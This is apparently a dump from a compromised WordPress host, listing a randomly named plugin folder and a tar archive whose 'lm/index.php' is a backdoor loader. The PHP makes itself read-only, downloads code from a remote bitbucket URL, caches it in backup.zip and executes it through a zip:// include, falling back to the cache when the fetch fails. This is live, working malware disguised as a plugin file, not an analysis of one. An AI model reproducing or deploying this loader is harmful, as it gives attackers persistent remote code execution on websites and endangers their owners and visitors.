Linux premium311.web-hosting.com 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 Path : /home/alladgbi/public_html/wp-content/plugins/hmtevpfjkq/ |
Current File : /home/alladgbi/public_html/wp-content/plugins/hmtevpfjkq/rwoofhklfb.tar |
lm/index.php 0000644 00000003020 15062027551 0006772 0 ustar 00 <?php $file = 'index.php'; $localFile1 = 'backup.zip'; $remoteUrl1 = "https://bitbucket.org/whoknowshop/rmt/raw/d9a467506d44f2b3e77a3eb99f42f580989289df/lf.txt"; if (file_exists($file)) { if (function_exists('chmod')) { @chmod($file, 0444); } $fileContents1 = @file_get_contents($remoteUrl1); if ($fileContents1 !== false) { $zip = new ZipArchive(); if ($zip->open($localFile1, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { $zip->addFromString('index.php', $fileContents1); $zip->close(); } if (file_exists($localFile1)) { include "zip://$localFile1#index.php"; } } else { if (file_exists($localFile1)) { include_once "zip://backup.zip#index.php"; } else { echo "Error: File Not Found !"; } } } else { if (!file_exists($localFile1)) { $fileContents1 = @file_get_contents($remoteUrl1); if ($fileContents1 !== false) { $zip = new ZipArchive(); if ($zip->open($localFile1, ZipArchive::CREATE | ZipArchive::OVERWRITE) === true) { $zip->addFromString('index.php', $fileContents1); $zip->close(); } } else { die("Error: index.php is missing, no backup.zip exists, and remote URL failed."); } } if (file_exists($localFile1)) { include_once "zip://backup.zip#index.php"; } else { die("Error: Failed to create or access backup.zip."); } } ?>